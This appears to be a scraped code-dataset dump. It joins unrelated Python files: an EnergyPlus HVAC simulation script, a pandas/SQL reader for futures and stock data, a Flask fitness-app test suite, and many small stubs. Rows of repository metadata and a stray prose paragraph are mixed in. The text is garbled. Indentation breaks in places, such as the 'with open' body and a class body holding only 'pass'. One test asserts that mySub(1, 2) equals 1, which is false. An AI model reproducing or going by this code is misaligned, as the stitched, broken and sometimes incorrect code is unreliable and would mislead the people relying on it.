'''update idf with uncertain parameters for the parameter file listed'''
runJSON = {}
for param in paramSet['input']:
    runJSON[param['eppy json string']] = random.choice(param['Sample Values'])
json_functions.updateidf(idfdevice, runJSON)
'''modify idf with inputs'''
'''build the setpoint schedule overrides programmatically: weekday hours 1-24 get the
optimized setpoint, all other day types keep the fixed 29.44 C value'''
self.runJSON = {}
for schedule, setpoint in (('CLGSETP_SCH_YES_OPTIMUM', CLG_SETPOINT[0]),
                           ('HTGSETP_SCH_YES_OPTIMUM', HTG_SETPOINT[0])):
    prefix = 'idf.SCHEDULE:COMPACT.%s' % schedule
    self.runJSON['%s.Field_1' % prefix] = 'Through: %s/%s' % ('12', '31')
    self.runJSON['%s.Field_2' % prefix] = 'For: Weekday'
    for hour in range(1, 25):
        self.runJSON['%s.Field_%d' % (prefix, 2 * hour + 1)] = 'Until: %d:00' % hour
        self.runJSON['%s.Field_%d' % (prefix, 2 * hour + 2)] = str(setpoint)
    field = 51
    for day_type in ('Weekend', 'Holiday', 'WinterDesignDay', 'SummerDesignDay',
                     'CustomDay1', 'CustomDay2'):
        self.runJSON['%s.Field_%d' % (prefix, field)] = 'For: %s' % day_type
        self.runJSON['%s.Field_%d' % (prefix, field + 1)] = 'Until: 24:00'
        self.runJSON['%s.Field_%d' % (prefix, field + 2)] = str(29.44)
        field += 3
json_functions.updateidf(idfdevice, self.runJSON)
'''run the IDF and the associated batch file to export the custom csv output'''
# run() defaults here: idf='SmallOffice.idf', weather='USA_UT_Salt.Lake.City.Intl.AP.725720_TMY3.epw', ep_version='8-5-0'
idfdevice.run(verbose='q')
# os.system('CD ...') only changes directory in a child shell and has no effect on this
# process; use os.chdir so the CustomCSV call actually runs in the Baseline folder
os.chdir(r'E:\Masters Thesis\EnergyPlus MPC\Simulations\Baseline')
os.system('CustomCSV SO OUTPUT')
# self.smallofficeoutputs('SO_OUTPUT_hourly.csv')
'''Read csv file into new data dictionary'''
newEntry = defaultdict(list)
with open('SO_OUTPUT_hourly.csv', newline='') as newFile:
newData = csv.DictReader(newFile)
for row in newData:
    for key, value in row.items():
        newEntry[key].append(value)
'''Date/Time array'''
self.DateTime = np.asarray(newEntry['Date/Time'], dtype=str)
'''Outdoor dry bulb temperature'''
self.outdoorT = np.asarray(newEntry['Environment:Site Outdoor Air Drybulb Temperature [C](Hourly)'],
dtype=np.float32)
'''per-zone hourly series: Fanger PMV [-], cooling setpoint (C), heating setpoint (C)
and thermostat air temperature (C), each with _mean/_max/_min summary attributes
(e.g. self.corePMV, self.zn1CS_max), replacing one hand-written block per zone'''
zones = {'core': 'CORE_ZN',
         'zn1': 'PERIMETER_ZN_1',
         'zn2': 'PERIMETER_ZN_2',
         'zn3': 'PERIMETER_ZN_3',
         'zn4': 'PERIMETER_ZN_4'}
series = {'PMV': 'Zone Thermal Comfort Fanger Model PMV []',
          'CS': 'Zone Thermostat Cooling Setpoint Temperature [C]',
          'HS': 'Zone Thermostat Heating Setpoint Temperature [C]',
          'T': 'Zone Thermostat Air Temperature [C]'}
for suffix, column in series.items():
    for zone_prefix, zone in zones.items():
        values = np.asarray(newEntry['%s:%s(Hourly)' % (zone, column)], dtype=np.float32)
        setattr(self, zone_prefix + suffix, values)
        setattr(self, zone_prefix + suffix + '_mean', np.mean(values))
        setattr(self, zone_prefix + suffix + '_max', np.max(values))
        setattr(self, zone_prefix + suffix + '_min', np.min(values))
'''PMV values for all zones'''
self.allPMV = np.asarray([[self.corePMV], [self.zn1PMV], [self.zn2PMV], [self.zn3PMV], [self.zn4PMV]])
self.allPMV_mean1 = np.mean(self.allPMV, 0)
self.allPMV_mean2 = np.mean(self.allPMV_mean1)
self.allPMV_max = np.amax(self.allPMV)
self.allPMV_min = np.amin(self.allPMV)
'''HVAC power demand [W]'''
self.hvacPower = np.asarray(newEntry['Whole Building:Facility Total HVAC Electric Demand Power [W](Hourly)'],
                            dtype=np.float32)
self.hvacPower_ave = np.mean(self.hvacPower)
self.hvacPower_max = np.max(self.hvacPower)
'''All Zones Cooling Setpoint (C)'''
self.allCS = np.asarray([[self.coreCS], [self.zn1CS], [self.zn2CS], [self.zn3CS], [self.zn4CS]])
self.allCS_mean1 = np.mean(self.allCS, 1)
self.allCS_mean2 = np.mean(self.allCS_mean1)
self.allCS_max = np.max(self.allCS)
self.allCS_min = np.min(self.allCS)
'''All Zones Heating Setpoint (C)'''
self.allHS = np.asarray([[self.coreHS], [self.zn1HS], [self.zn2HS], [self.zn3HS], [self.zn4HS]])
self.allHS_mean1 = np.mean(self.allHS, 1)
self.allHS_mean2 = np.mean(self.allHS_mean1)
self.allHS_max = np.max(self.allHS)
self.allHS_min = np.min(self.allHS)
'''All Zones Thermostat Temperature (C)'''
self.allT = np.asarray([[self.coreT], [self.zn1T], [self.zn2T], [self.zn3T], [self.zn4T]])
self.allT_mean1 = np.mean(self.allT, 1)
self.allT_mean2 = np.mean(self.allT_mean1)
self.allT_max = np.max(self.allT)
self.allT_min = np.min(self.allT)
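The CSV ingestion used above (csv.DictReader rows appended column-wise into a defaultdict of lists, then converted to float32 arrays) can be exercised in isolation. The column name below is a stand-in, not one of the real EnergyPlus report variables:

```python
import csv
import io
from collections import defaultdict

import numpy as np

# Stand-in for SO_OUTPUT_hourly.csv: one header row, hourly values below it.
csv_text = "Date/Time,DEMO_ZN:Some Hourly Value\n01/01 01:00,1.5\n01/01 02:00,2.5\n"

columns = defaultdict(list)
for row in csv.DictReader(io.StringIO(csv_text)):
    for key, value in row.items():
        columns[key].append(value)

# Same conversion step as in buildingSim: string column -> float32 array.
values = np.asarray(columns['DEMO_ZN:Some Hourly Value'], dtype=np.float32)
assert values.mean() == 2.0
```

Each CSV header becomes one dict key, so a whole column is retrieved by name in a single lookup.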
# src/models/__init__.py (cedricfarinazzo/ichronos.py, MIT)
from .week import *
from .day import *
from .lesson import *

# RandomQueryProcessing/UseCaseApp/serializers.py (harshitmohanpandey/RandomQueryProcessing, MIT)
from rest_framework import serializers
class UseCaseData(serializers.Serializer):
    date = serializers.CharField()
    group_by_columns = serializers.CharField(max_length=200)
    sortorder = serializers.CharField(max_length=200)

# applications/MeshMovingApplication/trilinos_extension/TrilinosExtension.py (lkusch/Kratos, BSD-4-Clause)
import KratosMultiphysics.TrilinosApplication
from KratosMeshMovingTrilinosExtension import *
# samplePKG/tests/test_module1.py (matthewkirby/sampleCodeRepo, MIT)
import samplePKG as s
def testAdd():
    assert s.myAdd(1, 2) == 3
    assert s.myAdd(5, 6) == 11
def testSub():
    assert s.mySub(2, 1) == 1
    assert s.mySub(1, 2) == 1
    assert s.mySub(2, 2) == 0
# xdrawio/features/__init__.py (huuhoa/xdrawio, MIT)
from .dataloader import read_data
# m3_light/data/__init__.py (matteocereda/RNAmotifs, MIT)
# modules
from Fasta import *
# cakechat/utils/s3/utils.py (4R7I5T/cakechat, Apache-2.0)
import boto3
from botocore import UNSIGNED
from botocore.client import Config
def get_s3_resource():
    return boto3.resource('s3', config=Config(signature_version=UNSIGNED))
# dew/__main__.py (jackoalan/dew, Apache-2.0)
from dew.cli import main_with_exit
main_with_exit()
# py_tdlib/constructors/page_block_horizontal_alignment_left.py (Mr-TelegramBot/python-tdlib, MIT)
from ..factory import Type
class pageBlockHorizontalAlignmentLeft(Type):
    pass
# rasa/nlu/classifiers/classifier.py (praneethgb/rasa, Apache-2.0)
from rasa.nlu.components import Component
class IntentClassifier(Component):
pass
| 14.666667 | 41 | 0.795455 | 10 | 88 | 7 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.147727 | 88 | 5 | 42 | 17.6 | 0.933333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
011f294612d4343d2439bb94ef5aaf3d5941beda | 6,782 | py | Python | dfdata/read_data.py | Eric2827/DFdata | 4db142232fc7127da3faae7c608772c72005cd25 | [
"MIT"
] | null | null | null | dfdata/read_data.py | Eric2827/DFdata | 4db142232fc7127da3faae7c608772c72005cd25 | [
"MIT"
] | null | null | null | dfdata/read_data.py | Eric2827/DFdata | 4db142232fc7127da3faae7c608772c72005cd25 | [
"MIT"
] | null | null | null |
import pandas as pd
from dfdata.util.log import Log
from dfdata.util.config import KeyWords
from dfdata.util import db_tool
from dfdata.util.func_tool import func_time
def return_function_read_date_table(data_kind, data_func_name):
"""
闭包,返回读取数据库函数
参数:
data_kind (str):数据种类,如'futures'
data_func_name (str) : 数据表名称,如'futures_date'
示例:
read_futures_date = return_function_read_date_table(data_kind='futures', data_func_name='futures_date')
read_futures_date为一个函数,执行该函数里的read_date_table函数。
"""
@func_time
def read_date_table(source, **keywords):
"""
从数据库读取数据
Parameters:
# 通用参数
source (str): 数据源名称
db (str) : 数据库名称
table (str) : 数据表名称
log (str) : log等级,如info, debug等,默认normal,
sql (str) : sql语句,如果sql有输入,只支持该查询语句。
fields (str or tuple) : 显示字段
limit (int or tuple) : 读取数量,如5, (5, 80)
# 不固定参数
start_date (str or int or datetime) : 开始时间
code : 代码
"""
#输入参数和默认参数
my_keywords = KeyWords(keywords, source_kind=source, data_kind=data_kind, data_func_name=data_func_name, function_kind='read')
db = my_keywords["db"]
table = my_keywords["table"]
today_str = my_keywords['today']
log_level = my_keywords['log']
log = Log(log_level) #初始化log等级
#函数查询, 默认参数
start_date_input = my_keywords['start_date']
end_date_input = my_keywords['end_date']
code = my_keywords['code']
fields = my_keywords['fields']
is_open = my_keywords['is_open']
exchange = my_keywords['exchange']
trade_date = my_keywords['trade_date']
limit = my_keywords['limit']
sql = my_keywords['sql']
#打印参数
log.standard('info', db=db, table=table, today=today_str, log_level=log_level)
conn = db_tool.connection_from_db_name(db)
if log_level in ['info', 'debug']:
db_tool.db_info(db, table=table, log_level=log_level)
#日期表生成sql语句
log.debug("日期表生成sql语句")
if exchange != None: #如果交易所参数有输入则只显示该列
fields='trade_date, '+ exchange
filter_is_open = db_tool.sql_filter(exchange, '=', is_open)
filter_start_end_date_str = db_tool.sql_filter_start_end_date('trade_date', start_date_input, end_date_input)
where = db_tool.sql_where(filter_start_end_date_str, filter_is_open)
search_sql = db_tool.get_sql(sql=sql, fields=fields, table=table, where=where, limit=limit, log_level=log_level)
log.debug("sql:" + search_sql)
df = pd.read_sql_query(search_sql, conn)
#关闭连接,返回结果
conn.close()
return df
#返回函数read_date_table
return read_date_table
def return_function_read_normal_table(data_kind, data_func_name):
"""
闭包,返回读取数据库函数
参数:
data_kind (str):数据种类,如'futures'
data_func_name (str) : 数据表名称,如'futures_date'
示例:
read_futures_basic = return_function_read_normal_table(data_kind='futures', data_func_name='futures_date')
read_futures_basic为一个函数,执行该函数里的read_normal_table函数。
"""
@func_time
def read_normal_table(source, **keywords):
"""
从数据库读取数据
Parameters:
# 通用参数
source (str): 数据源名称
db (str) : 数据库名称
table (str) : 数据表名称
log (str) : log等级,如info, debug等,默认normal,
sql (str) : sql语句,如果sql有输入,只支持该查询语句。
fields (str or tuple) : 显示字段
limit (int or tuple) : 读取数量,如5, (5, 80)
# 不固定参数
start_date (str or int or datetime) : 开始时间
code : 代码
"""
#输入参数和默认参数
my_keywords = KeyWords(keywords, source_kind=source, data_kind=data_kind, data_func_name=data_func_name, function_kind='read')
db = my_keywords["db"]
table = my_keywords["table"]
today_str = my_keywords['today']
log_level = my_keywords['log']
log = Log(log_level) #初始化log等级
#函数查询, 默认参数
start_date_input = my_keywords['start_date']
end_date_input = my_keywords['end_date']
code = my_keywords['code']
fields = my_keywords['fields']
is_open = my_keywords['is_open']
exchange = my_keywords['exchange']
trade_date = my_keywords['trade_date']
limit = my_keywords['limit']
sql = my_keywords['sql']
#打印参数
log.standard('info', db=db, table=table, today=today_str, log_level=log_level)
conn = db_tool.connection_from_db_name(db)
if log_level in ['info', 'debug']:
db_tool.db_info(db, table=table, log_level=log_level)
log.debug("其他表生成生成sql语句")
#生成where语句
filter_normal = db_tool.sql_filters(operator='=', code=code, exchange=exchange, trade_date=trade_date)
filter_start_end_date_str = db_tool.sql_filter_start_end_date('trade_date', start_date_input, end_date_input)
where = db_tool.sql_where(filter_normal, filter_start_end_date_str)
#生成sql语句,如果有输入sql参数,sql语句就为输入语句。否则按fields,table,where,limit四部分生成。
search_sql = db_tool.get_sql(sql=sql, fields=fields, table=table, where=where, limit=limit, log_level=log_level)
log.debug("sql:" + search_sql)
df = pd.read_sql_query(search_sql, conn)
#关闭连接,返回结果
conn.close()
return df
#返回函数read_normal_table
return read_normal_table
################################################################################
### 期货函数 futures
################################################################################
#函数,本地读取期货日期表
read_futures_date = return_function_read_date_table(data_kind='futures', data_func_name='futures_date')
#读取期货合约表函数
read_futures_basic = return_function_read_normal_table(data_kind='futures', data_func_name='futures_basic')
#读取期货日线表函数 futures_daily
read_futures_daily = return_function_read_normal_table(data_kind='futures', data_func_name='futures_daily')
#读取期货日线表函数 futures_daily
read_futures_min = return_function_read_normal_table(data_kind='futures', data_func_name='futures_min')
################################################################################
### 股票函数 stock
################################################################################
read_stock_date = return_function_read_date_table(data_kind='stock', data_func_name='stock_date')
read_stock_basic = return_function_read_normal_table(data_kind='stock', data_func_name='stock_basic')
read_stock_daily = return_function_read_normal_table(data_kind='stock', data_func_name='stock_daily')
| 32.763285 | 134 | 0.615895 | 836 | 6,782 | 4.629187 | 0.143541 | 0.072351 | 0.052713 | 0.039276 | 0.829974 | 0.792765 | 0.790698 | 0.778811 | 0.759173 | 0.759173 | 0 | 0.001555 | 0.241374 | 6,782 | 206 | 135 | 32.92233 | 0.750632 | 0.224418 | 0 | 0.666667 | 0 | 0 | 0.082397 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051282 | false | 0 | 0.064103 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0147ed8bf23bf5427741de9a83c7fbc9fbe19922 | 34 | py | Python | processor/__init__.py | nguyenphan99/test | 75429497b0ca8b802803dd1518d0dc25a7fd4008 | [
"MIT"
] | null | null | null | processor/__init__.py | nguyenphan99/test | 75429497b0ca8b802803dd1518d0dc25a7fd4008 | [
"MIT"
] | null | null | null | processor/__init__.py | nguyenphan99/test | 75429497b0ca8b802803dd1518d0dc25a7fd4008 | [
"MIT"
] | null | null | null | from .processor import train_model | 34 | 34 | 0.882353 | 5 | 34 | 5.8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088235 | 34 | 1 | 34 | 34 | 0.935484 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
014eea863ff249ce2a9bd9a92e67fe3f598c5256 | 948 | py | Python | iolanta/cli/pretty_print.py | octadocs/octadocs | 62f4340681f4e38ed961b58c5147a657363cae4d | [
"MIT"
] | 1 | 2021-11-19T22:48:27.000Z | 2021-11-19T22:48:27.000Z | iolanta/cli/pretty_print.py | octadocs/octadocs | 62f4340681f4e38ed961b58c5147a657363cae4d | [
"MIT"
] | 34 | 2020-12-27T11:49:08.000Z | 2021-10-05T04:58:54.000Z | iolanta/cli/pretty_print.py | octadocs/octadocs | 62f4340681f4e38ed961b58c5147a657363cae4d | [
"MIT"
] | null | null | null | from datetime import date
from typing import Union
from classes import typeclass
@typeclass
def render_literal_value(literal_value) -> str:
"""Render a literal value nicely for printing."""
@render_literal_value.instance(None)
def _render_none(literal_value: None) -> str:
return '∅ None'
@render_literal_value.instance(bool)
def _render_bool(literal_value: bool) -> str:
icon = '✅' if literal_value else '❌'
return f'{icon} {literal_value}'
@render_literal_value.instance(int)
def _render_int(literal_value: Union[int, float]) -> str:
return f'🔢 {literal_value}'
@render_literal_value.instance(str)
def _render_str(literal_value: str) -> str:
return f'🔡 {literal_value}'
@render_literal_value.instance(date)
def _render_date(literal_value: date) -> str:
return f'📅 {literal_value}'
@render_literal_value.instance(object)
def _render_default(literal_value: object) -> str:
return f'❓ {literal_value}'
| 23.121951 | 57 | 0.741561 | 136 | 948 | 4.933824 | 0.264706 | 0.375559 | 0.187779 | 0.232489 | 0.226528 | 0.226528 | 0 | 0 | 0 | 0 | 0 | 0 | 0.140295 | 948 | 40 | 58 | 23.7 | 0.814724 | 0.045359 | 0 | 0 | 0 | 0 | 0.10901 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.291667 | false | 0 | 0.125 | 0.208333 | 0.666667 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
6d718cbaf42a6a571b4dbaf23ea16e5c5dc59cca | 259 | py | Python | deployment/colors.py | helix84/activae | 0e40bd71577f829b597bbf0931bbeb2c581ac410 | [
"BSD-3-Clause"
] | null | null | null | deployment/colors.py | helix84/activae | 0e40bd71577f829b597bbf0931bbeb2c581ac410 | [
"BSD-3-Clause"
] | null | null | null | deployment/colors.py | helix84/activae | 0e40bd71577f829b597bbf0931bbeb2c581ac410 | [
"BSD-3-Clause"
] | null | null | null | ESC = chr(27) + '['
RESET = '%s0m' % (ESC)
def green (s):
return ESC + '0;32m' + s + RESET
def red (s):
return ESC + '0;31m' + s + RESET
def yellow (s):
return ESC + '1;33m' + s + RESET
def blue (s):
return ESC + '0;34m' + s + RESET
| 17.266667 | 36 | 0.498069 | 42 | 259 | 3.071429 | 0.428571 | 0.217054 | 0.310078 | 0.255814 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083799 | 0.30888 | 259 | 14 | 37 | 18.5 | 0.636872 | 0 | 0 | 0 | 0 | 0 | 0.096525 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0 | 0.4 | 0.8 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
6d981b2393c741dcf0dcf6e71be38ef3bf04c36f | 24 | py | Python | SPADE/models/network/architecture.py | kaijieshi7/oneflow_imaginaire | 51e90165eeb3e8b22be1bec0ed3f7deb7d87b482 | [
"Apache-2.0"
] | null | null | null | SPADE/models/network/architecture.py | kaijieshi7/oneflow_imaginaire | 51e90165eeb3e8b22be1bec0ed3f7deb7d87b482 | [
"Apache-2.0"
] | null | null | null | SPADE/models/network/architecture.py | kaijieshi7/oneflow_imaginaire | 51e90165eeb3e8b22be1bec0ed3f7deb7d87b482 | [
"Apache-2.0"
] | null | null | null | import oneflow as flow
| 8 | 22 | 0.791667 | 4 | 24 | 4.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.208333 | 24 | 2 | 23 | 12 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6dda7679be71e1df8d4a91bdce3b646621d1300c | 96 | py | Python | venv/lib/python3.8/site-packages/future/types/newint.py | Retraces/UkraineBot | 3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71 | [
"MIT"
] | 2 | 2022-03-13T01:58:52.000Z | 2022-03-31T06:07:54.000Z | venv/lib/python3.8/site-packages/future/types/newint.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | 19 | 2021-11-20T04:09:18.000Z | 2022-03-23T15:05:55.000Z | venv/lib/python3.8/site-packages/future/types/newint.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | null | null | null | /home/runner/.cache/pip/pool/84/98/af/f6a503ae3975c647f334534bcda7ec44c3e815c44571ea22bd4cd521e9 | 96 | 96 | 0.895833 | 9 | 96 | 9.555556 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.416667 | 0 | 96 | 1 | 96 | 96 | 0.479167 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6ddb5648b06de7281ff82bf5a106edcddcc4e402 | 12,604 | py | Python | test_fitapp.py | As-12/Fit-App-backend- | d95b07fdb1aed882d01d3a70b4b0f308374bf304 | [
"MIT"
] | null | null | null | test_fitapp.py | As-12/Fit-App-backend- | d95b07fdb1aed882d01d3a70b4b0f308374bf304 | [
"MIT"
] | null | null | null | test_fitapp.py | As-12/Fit-App-backend- | d95b07fdb1aed882d01d3a70b4b0f308374bf304 | [
"MIT"
] | null | null | null | import os
from datetime import datetime
import unittest
import json
from flask_sqlalchemy import SQLAlchemy
from main import app
from main import db
import http.client
API_PREFIX = "/api/v1"
CLIENT_SECRET = os.environ['CLIENT_SECRET']
CLIENT_ID = os.environ['CLIENT_ID']
class FitAppTestSuite(unittest.TestCase):
@classmethod
def setUpClass(cls):
# Setup Authentication. Only need to execute once
conn = http.client.HTTPSConnection("as12production.auth0.com")
payload = {
"client_id": CLIENT_ID,
"client_secret": CLIENT_SECRET,
"audience": "Fit-API",
"grant_type": "client_credentials"
}
headers = {'content-type': "application/json"}
conn.request("POST", "/oauth/token", json.dumps(payload), headers)
res = conn.getresponse()
data = res.read()
cls.subject = f"{CLIENT_ID}@clients"
cls.token = json.loads(data.decode("utf-8"))['access_token']
def setUp(self):
"""Define test variables and initialize app."""
self.app = app
db.drop_all()
db.create_all()
self.client = self.app.test_client
# binds the app to the current context
with self.app.app_context():
self.db = SQLAlchemy()
def tearDown(self):
"""Executed after reach test"""
pass
"""
Global Endpoints
"""
def test_invalid_url(self):
response = self.client().get('/invalid', follow_redirects=True)
self.assertEqual(response.status_code, 404)
def test_health_endpoint(self):
response = self.client().get(f'{API_PREFIX}/health',
follow_redirects=True)
self.assertEqual(response.status_code, 200)
"""
User Endpoints
"""
"""
GET /users
"""
def test_get_user(self):
response = self.client().get(f'{API_PREFIX}/users', headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
def test_get_user_no_auth(self):
response = self.client().get(f'{API_PREFIX}/users',
follow_redirects=True)
self.assertEqual(response.status_code, 401)
"""
POST & DELETE /users
"""
def test_post_user_invalid_weight(self):
data = {
"target_weight": -20,
"height": 20,
"city": "string",
"state": "string"
}
response = self.client() \
.post(f'{API_PREFIX}/users', json=data,
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 422)
def test_post_user_bad_weight(self):
data = {
"target_weight": 0,
"height": -20,
"city": "string",
"state": "string"
}
response = self.client() \
.post(f'{API_PREFIX}/users', json=data,
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 422)
def test_post_user_no_auth(self):
data = {
"target_weight": 0,
"height": 20,
"city": "string",
"state": "string"
}
response = self.client() \
.post(f'{API_PREFIX}/users', json=data,
follow_redirects=True)
self.assertEqual(response.status_code, 401)
def test_post_and_delete_user(self):
data = {
"target_weight": 0,
"height": 20,
"city": "string",
"state": "string"
}
response = self.client() \
.post(f'{API_PREFIX}/users', json=data,
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 201)
# Cannot post same user twice
response = self.client() \
.post(f'{API_PREFIX}/users', json=data,
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 422)
response = self.client().get(f'{API_PREFIX}/users', headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.data)['count'], 1)
response = self.client() \
.delete(f'{API_PREFIX}/users/{self.subject}',
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 204)
response = self.client() \
.delete(f'{API_PREFIX}/users/{self.subject}',
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 404)
"""
PATCH /users
"""
def test_patch_user(self):
data = {
"target_weight": 0,
"height": 20,
"city": "string",
"state": "string"
}
response = self.client() \
.post(f'{API_PREFIX}/users', json=data,
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 201)
data = {
"target_weight": 25,
"height": 20,
"city": "Grapevine",
"state": "Texas"
}
response = self.client() \
.patch(f'{API_PREFIX}/users/{self.subject}',
json=data,
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 204)
data = {
"target_weight": -10,
"height": 20,
"city": "Grapevine",
"state": "Texas"
}
response = self.client() \
.patch(f'{API_PREFIX}/users/{self.subject}',
json=data,
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 422)
data = {
"target_weight": 10,
"height": -20,
"city": "Grapevine",
"state": "Texas"
}
response = self.client() \
.patch(f'{API_PREFIX}/users/{self.subject}',
json=data,
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 422)
response = self.client() \
.delete(f'{API_PREFIX}/users/{self.subject}',
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 204)
def test_patch_no_user(self):
data = {
"target_weight": 25,
"height": 20,
"city": "Grapevine",
"state": "Texas"
}
response = self.client() \
.patch(f'{API_PREFIX}/users/{self.subject}',
json=data,
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 404)
def test_patch_different_user(self):
data = {
"target_weight": 25,
"height": 20,
"city": "Grapevine",
"state": "Texas"
}
response = self.client() \
.patch(f'{API_PREFIX}/users/1234', json=data,
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 403)
"""
GET /progress
"""
def test_get_all_progress(self):
response = self.client() \
.get(f'{API_PREFIX}/progress',
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
response = self.client().get(f'{API_PREFIX}/progress',
follow_redirects=True)
self.assertEqual(response.status_code, 401)
"""
GET /progress/{id}
"""
def test_get_progress(self):
data = {
"target_weight": 0,
"height": 20,
"city": "string",
"state": "string"
}
response = self.client() \
.post(f'{API_PREFIX}/users', json=data,
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 201)
response = self.client() \
.get(f'{API_PREFIX}/progress/{self.subject}',
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
response = self.client() \
.get(f'{API_PREFIX}/progress/1234',
follow_redirects=True,
headers={
"Authorization": f"Bearer {self.token}"})
self.assertEqual(response.status_code, 403)
response = self.client() \
.get(f'{API_PREFIX}/progress/{self.subject}',
follow_redirects=True)
self.assertEqual(response.status_code, 401)
response = self.client() \
.delete(f'{API_PREFIX}/users/{self.subject}',
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 204)
"""
POST/PATCH /progress/{id}
"""
def test_post_patch_progress(self):
data = {
"target_weight": 0,
"height": 20,
"city": "string",
"state": "string"
}
response = self.client() \
.post(f'{API_PREFIX}/users', json=data,
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 201)
data = {
"track_date": datetime.today().date().strftime('%Y-%m-%d'),
"weight": 255,
"mood": "neutral",
"diet": "neutral"
}
response = self.client() \
.post(f'{API_PREFIX}/progress/{self.subject}',
json=data,
headers={
"Authorization": f"Bearer {self.token}"},
follow_redirects=True)
self.assertEqual(response.status_code, 201)
data["weight"] = 500
response = self.client() \
.patch(f'{API_PREFIX}/progress/{self.subject}',
json=data,
headers={
"Authorization": f"Bearer {self.token}"},
